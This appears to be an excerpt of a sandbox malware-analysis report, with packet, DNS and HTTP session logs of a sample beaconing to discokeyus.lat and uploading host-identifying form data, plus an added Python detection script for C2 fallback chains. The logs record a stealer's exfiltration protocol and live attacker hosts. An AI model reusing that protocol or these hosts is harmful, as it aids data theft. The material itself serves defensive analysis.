                                                                                                              Dec 20, 2024 16:55:59.096986055 CET44349726104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:00.318391085 CET44349726104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:00.318495989 CET49726443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:00.319693089 CET49726443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:00.319703102 CET44349726104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:00.320033073 CET44349726104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:00.329849958 CET49726443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:00.329919100 CET49726443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:00.329925060 CET44349726104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:01.110909939 CET44349726104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:01.111494064 CET44349726104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:01.111659050 CET49726443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:01.121673107 CET49726443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:01.121691942 CET44349726104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:01.771243095 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:01.771269083 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:01.771342039 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:01.771696091 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:01.771709919 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:02.993489981 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:02.993587017 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.002646923 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.002655983 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.002959013 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.033124924 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.034171104 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.034220934 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.034311056 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.034349918 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.034445047 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.034506083 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.034658909 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.034691095 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.034821033 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.034851074 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.034976006 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.034996033 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.035005093 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.035128117 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.035160065 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.079327106 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.079473972 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.079519987 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.079535007 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.123336077 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.123502970 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.123548985 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.123581886 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.167335987 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.167476892 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.215334892 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.397480011 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:06.880937099 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:06.881027937 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:06.881113052 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:06.881341934 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:06.881361961 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:06.932346106 CET49730443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:06.932389975 CET44349730104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:06.932496071 CET49730443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:06.933260918 CET49730443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:06.933305979 CET44349730104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:07.187799931 CET49730443192.168.2.6104.21.21.99
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 16:55:43.732477903 CET | 58462 | 53 | 192.168.2.6 | 1.1.1.1
Dec 20, 2024 16:55:43.871666908 CET | 53 | 58462 | 1.1.1.1 | 192.168.2.6
Dec 20, 2024 16:55:43.929541111 CET | 64495 | 53 | 192.168.2.6 | 1.1.1.1
Dec 20, 2024 16:55:44.072011948 CET | 53 | 64495 | 1.1.1.1 | 192.168.2.6
Dec 20, 2024 16:55:44.125790119 CET | 63435 | 53 | 192.168.2.6 | 1.1.1.1
Dec 20, 2024 16:55:44.266213894 CET | 53 | 63435 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 16:55:43.732477903 CET | 192.168.2.6 | 1.1.1.1 | 0x323c | Standard query (0) | sweepyribs.lat | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:55:43.929541111 CET | 192.168.2.6 | 1.1.1.1 | 0x2440 | Standard query (0) | grannyejh.lat | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:55:44.125790119 CET | 192.168.2.6 | 1.1.1.1 | 0xaec9 | Standard query (0) | discokeyus.lat | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 16:55:43.871666908 CET | 1.1.1.1 | 192.168.2.6 | 0x323c | Name error (3) | sweepyribs.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:55:44.072011948 CET | 1.1.1.1 | 192.168.2.6 | 0x2440 | Name error (3) | grannyejh.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:55:44.266213894 CET | 1.1.1.1 | 192.168.2.6 | 0xaec9 | No error (0) | discokeyus.lat | | 104.21.21.99 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:55:44.266213894 CET | 1.1.1.1 | 192.168.2.6 | 0xaec9 | No error (0) | discokeyus.lat | | 172.67.197.170 | A (IP address) | IN (0x0001) | false
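The DNS tables above show the sample walking a list of candidate C2 names: the first two .lat lookups come back NXDOMAIN (Name error (3)) and only the third resolves, after which the TCP table shows one fresh client port after another opened to 104.21.21.99:443. The script below is an added example, not Joe Sandbox code or anything from the report, that correlates those two tables to surface that fallback chain and the connections that follow it. The tuple field order, the two-NXDOMAIN threshold and all function names are assumptions made for this example; the sample records are transcribed from the tables above, keeping only the first outbound packet of each client port from the TCP table (the earlier 49716 session listed under the HTTP sessions is not included).

```python
import re
from collections import defaultdict
from datetime import datetime

# Added example (not Joe Sandbox code). Record layouts mirror the report's DNS query,
# DNS answer and TCP tables; tuple field order and function names are assumptions.

TS_FMT = "%b %d, %Y %H:%M:%S.%f"


def parse_ts(s):
    """'Dec 20, 2024 16:55:43.732477903 CET' -> datetime. The zone label is dropped and
    the nine fractional digits are truncated to the six that strptime accepts."""
    stamp = s.rsplit(" ", 1)[0]
    head, frac = stamp.rsplit(".", 1)
    return datetime.strptime(f"{head}.{frac[:6]}", TS_FMT)


def rcode_of(label):
    """Numeric RCODE from the report's 'Name error (3)' / 'No error (0)' labels."""
    m = re.search(r"\((\d+)\)", label)
    return int(m.group(1)) if m else -1


# Constructed sample, transcribed from the tables above.
# DNS queries: (timestamp, src ip, dst ip, transaction id, name)
DNS_QUERIES = [
    ("Dec 20, 2024 16:55:43.732477903 CET", "192.168.2.6", "1.1.1.1", 0x323c, "sweepyribs.lat"),
    ("Dec 20, 2024 16:55:43.929541111 CET", "192.168.2.6", "1.1.1.1", 0x2440, "grannyejh.lat"),
    ("Dec 20, 2024 16:55:44.125790119 CET", "192.168.2.6", "1.1.1.1", 0xaec9, "discokeyus.lat"),
]
# DNS answers: (timestamp, src ip, dst ip, transaction id, reply-code label, name, address or None)
DNS_ANSWERS = [
    ("Dec 20, 2024 16:55:43.871666908 CET", "1.1.1.1", "192.168.2.6", 0x323c, "Name error (3)", "sweepyribs.lat", None),
    ("Dec 20, 2024 16:55:44.072011948 CET", "1.1.1.1", "192.168.2.6", 0x2440, "Name error (3)", "grannyejh.lat", None),
    ("Dec 20, 2024 16:55:44.266213894 CET", "1.1.1.1", "192.168.2.6", 0xaec9, "No error (0)", "discokeyus.lat", "104.21.21.99"),
    ("Dec 20, 2024 16:55:44.266213894 CET", "1.1.1.1", "192.168.2.6", 0xaec9, "No error (0)", "discokeyus.lat", "172.67.197.170"),
]
# TCP packets: (timestamp, src port, dst port, src ip, dst ip); first outbound packet per
# client port from the TCP table, plus one server reply to show it is filtered out.
TCP_PACKETS = [
    ("Dec 20, 2024 16:55:48.098690987 CET", 49718, 443, "192.168.2.6", "104.21.21.99"),
    ("Dec 20, 2024 16:55:48.098974943 CET", 443, 49718, "104.21.21.99", "192.168.2.6"),
    ("Dec 20, 2024 16:55:50.614350080 CET", 49719, 443, "192.168.2.6", "104.21.21.99"),
    ("Dec 20, 2024 16:55:52.939160109 CET", 49721, 443, "192.168.2.6", "104.21.21.99"),
    ("Dec 20, 2024 16:55:55.947637081 CET", 49723, 443, "192.168.2.6", "104.21.21.99"),
    ("Dec 20, 2024 16:55:59.096456051 CET", 49726, 443, "192.168.2.6", "104.21.21.99"),
    ("Dec 20, 2024 16:56:01.771243095 CET", 49729, 443, "192.168.2.6", "104.21.21.99"),
    ("Dec 20, 2024 16:56:06.932346106 CET", 49730, 443, "192.168.2.6", "104.21.21.99"),
]


def resolution_chain(queries, answers, client):
    """The client's lookups in query order as (name, rcode, [addresses]); answers are
    paired to queries by transaction ID and name, as the report's tables do."""
    seen = defaultdict(lambda: {"rcode": None, "addrs": []})
    for _ts, _src, dst, txid, label, name, addr in answers:
        if dst != client:
            continue
        entry = seen[(txid, name)]
        entry["rcode"] = rcode_of(label)
        if addr:
            entry["addrs"].append(addr)
    chain = []
    for _ts, src, _dst, txid, name in sorted(queries, key=lambda q: parse_ts(q[0])):
        if src == client:
            entry = seen.get((txid, name), {"rcode": None, "addrs": []})
            chain.append((name, entry["rcode"], list(entry["addrs"])))
    return chain


def fallback_hit(chain, min_failures=2):
    """Flag a run of at least min_failures NXDOMAIN answers immediately followed by a name
    that resolves; returns (name, addresses) or None. The threshold is an assumption."""
    failures = 0
    for name, rcode, addrs in chain:
        if rcode == 3:                       # NXDOMAIN
            failures += 1
        elif rcode == 0 and addrs:
            return (name, addrs) if failures >= min_failures else None
        else:                                # unanswered or other error breaks the run
            failures = 0
    return None


def client_ports_to(packets, addrs, client, port=443):
    """Distinct client-side source ports, i.e. separate connections, to the resolved hosts."""
    return sorted({sp for _ts, sp, dp, src, dst in packets
                   if src == client and dst in addrs and dp == port})


def seconds_to_first_connect(answers, packets, addrs, client, port=443):
    """Delay between the resolving answer and the client's first packet to one of its addresses."""
    resolved = min(parse_ts(a[0]) for a in answers if a[2] == client and a[6] in addrs)
    first = min(parse_ts(p[0]) for p in packets
                if p[3] == client and p[4] in addrs and p[2] == port)
    return (first - resolved).total_seconds()


def summarize(client="192.168.2.6"):
    chain = resolution_chain(DNS_QUERIES, DNS_ANSWERS, client)
    hit = fallback_hit(chain)
    if hit is None:
        return f"{client}: no fallback chain"
    name, addrs = hit
    ports = client_ports_to(TCP_PACKETS, set(addrs), client)
    delay = seconds_to_first_connect(DNS_ANSWERS, TCP_PACKETS, set(addrs), client)
    failed = [n for n, rc, _ in chain if rc == 3]
    return (f"{client}: {len(failed)} NXDOMAIN ({', '.join(failed)}) then {name} -> "
            f"{', '.join(addrs)}; {len(ports)} connections to :443, first after {delay:.3f}s")


if __name__ == "__main__":
    print(summarize())
```

Pairing on transaction ID and name rather than on timestamps matters because the resolver returns both A records under one ID at the same instant; a join on time alone would collapse them. The threshold of two failed lookups is only a starting point: a stealer that happens to hit its first domain will show no NXDOMAIN run at all, so the resolved-name-to-many-fresh-connections half of the check should also stand on its own.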
                                                                                                              • discokeyus.lat
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49716 | 104.21.21.99 | 443 | 828 | C:\Users\user\Desktop\NAliwxUTJ4.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 15:55:46 UTC | 261 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: discokeyus.lat
2024-12-20 15:55:46 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-12-20 15:55:47 UTC | 1126 | IN | HTTP/1.1 200 OK
    Date: Fri, 20 Dec 2024 15:55:47 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=hj6ccklum2v3e90elo6pk1nar0; expires=Tue, 15 Apr 2025 09:42:26 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F8C%2F6NqhOQbI2BBtbPlNpKv5ZcA0xvgrZrV1iBZq5JW6qwtQp6azMbTV92iwjytaKP9HJoaAofultLMQOPM3NBMg22E60gsKW81bgWU8Glj1hunF9e0Fm696bw4Uh8k%2Fhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f50d192df7b4238-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1620&rtt_var=613&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=905&delivery_rate=1775075&cwnd=244&unsent_bytes=0&cid=3c3a7d2c5ae78816&ts=1756&x=0"
                                                                                                              2024-12-20 15:55:47 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                              Data Ascii: 2ok
                                                                                                              2024-12-20 15:55:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49718 | 104.21.21.99 | 443 | 828 | C:\Users\user\Desktop\NAliwxUTJ4.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 15:55:49 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 47
Host: discokeyus.lat
2024-12-20 15:55:49 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-20 15:55:50 UTC | 1123 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 15:55:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=8n1n4nlbs76k2j6gc8dvkpoonc; expires=Tue, 15 Apr 2025 09:42:28 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uXXAjYSz8ZLfdrq4Y9QXTJ1%2BifAu2FHJCiylsIabHt4dwEM9SQmtPkN6HsXIHrxm66vyAqtk60HuaI2NS2IAtjEWlj9a1p6qjtoOiuqfT8nl%2BUjdBgOen1EHu7FdQjQajg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f50d1a2fb02f797-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1601&rtt_var=625&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=945&delivery_rate=1715628&cwnd=161&unsent_bytes=0&cid=d340cadadb2341ba&ts=767&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49719 | 104.21.21.99 | 443 | 828 | C:\Users\user\Desktop\NAliwxUTJ4.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 15:55:51 UTC | 273 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=5FO31SHX5ZU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12817
Host: discokeyus.lat
2024-12-20 15:55:51 UTC | 12817 | OUT | Data Raw: 2d 2d 35 46 4f 33 31 53 48 58 35 5a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 35 44 30 44 42 32 33 44 45 44 41 44 37 30 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 46 4f 33 31 53 48 58 35 5a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 46 4f 33 31 53 48 58 35 5a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 35 46 4f 33 31 53 48 58 35 5a 55 0d 0a 43 6f 6e 74
Data Ascii:
--5FO31SHX5ZU
Content-Disposition: form-data; name="hwid"

CA5D0DB23DEDAD70AC8923850305D13E
--5FO31SHX5ZU
Content-Disposition: form-data; name="pid"

2
--5FO31SHX5ZU
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
--5FO31SHX5ZU
Cont
2024-12-20 15:55:52 UTC | 1134 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 15:55:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=uimnsro4s69dp62923ghnh7rq3; expires=Tue, 15 Apr 2025 09:42:31 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B9EisberW1UUrUlhTafc2EeFsjbkuW8FX%2Fc%2Bs%2FucOJvH5iHu3YaDmcsZ8JSUmavrJTsumeje3Dv6aLaur6lHW%2FvJlCO4F7Vb%2BIn3jfCz4M%2Fb6UcedZ6BtTJ1j8NGROdm4A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f50d1b1f83f4252-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1581&rtt_var=608&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2832&recv_bytes=13748&delivery_rate=1776155&cwnd=235&unsent_bytes=0&cid=5b638e9ceedc0c61&ts=914&x=0"
2024-12-20 15:55:52 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-20 15:55:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49721 | 104.21.21.99 | 443 | 828 | C:\Users\user\Desktop\NAliwxUTJ4.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 15:55:54 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=L8WUA7W76SOR97JQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15093
Host: discokeyus.lat
2024-12-20 15:55:54 UTC | 15093 | OUT | Data Raw: 2d 2d 4c 38 57 55 41 37 57 37 36 53 4f 52 39 37 4a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 35 44 30 44 42 32 33 44 45 44 41 44 37 30 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4c 38 57 55 41 37 57 37 36 53 4f 52 39 37 4a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 38 57 55 41 37 57 37 36 53 4f 52 39 37 4a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4c 38
Data Ascii:
--L8WUA7W76SOR97JQ
Content-Disposition: form-data; name="hwid"

CA5D0DB23DEDAD70AC8923850305D13E
--L8WUA7W76SOR97JQ
Content-Disposition: form-data; name="pid"

2
--L8WUA7W76SOR97JQ
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
--L8
2024-12-20 15:55:54 UTC | 1129 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 15:55:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=k47olhpgua5qpof7qkvrahh3lt; expires=Tue, 15 Apr 2025 09:42:33 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nkYmNsMxdVrq8BO5E8UA%2Bk4n02vkevoRm5Vd4T5gpF2g%2B7GGQEvVA9Ry7JW8AJQhegFJeWEIogyJZuu9J%2BQ7Mu219WXlDFkcSGl2oT1yGRXrCB3sDUq0DzpNWsF5GeDG1A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f50d1c08da64386-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1729&rtt_var=661&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2833&recv_bytes=16029&delivery_rate=1638608&cwnd=246&unsent_bytes=0&cid=05a7ef042b28d586&ts=836&x=0"
2024-12-20 15:55:54 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-20 15:55:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49723 | 104.21.21.99 | 443 | 828 | C:\Users\user\Desktop\NAliwxUTJ4.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 15:55:57 UTC | 273 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=EQ0XRQAPW21
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 19921
    Host: discokeyus.lat
2024-12-20 15:55:57 UTC | 15331 | OUT | Data Raw: 2d 2d 45 51 30 58 52 51 41 50 57 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 35 44 30 44 42 32 33 44 45 44 41 44 37 30 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 51 30 58 52 51 41 50 57 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 51 30 58 52 51 41 50 57 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 45 51 30 58 52 51 41 50 57 32 31 0d 0a 43 6f 6e 74
    Data Ascii: --EQ0XRQAPW21Content-Disposition: form-data; name="hwid"CA5D0DB23DEDAD70AC8923850305D13E--EQ0XRQAPW21Content-Disposition: form-data; name="pid"3--EQ0XRQAPW21Content-Disposition: form-data; name="lid"PsFKDg--pablo--EQ0XRQAPW21Cont
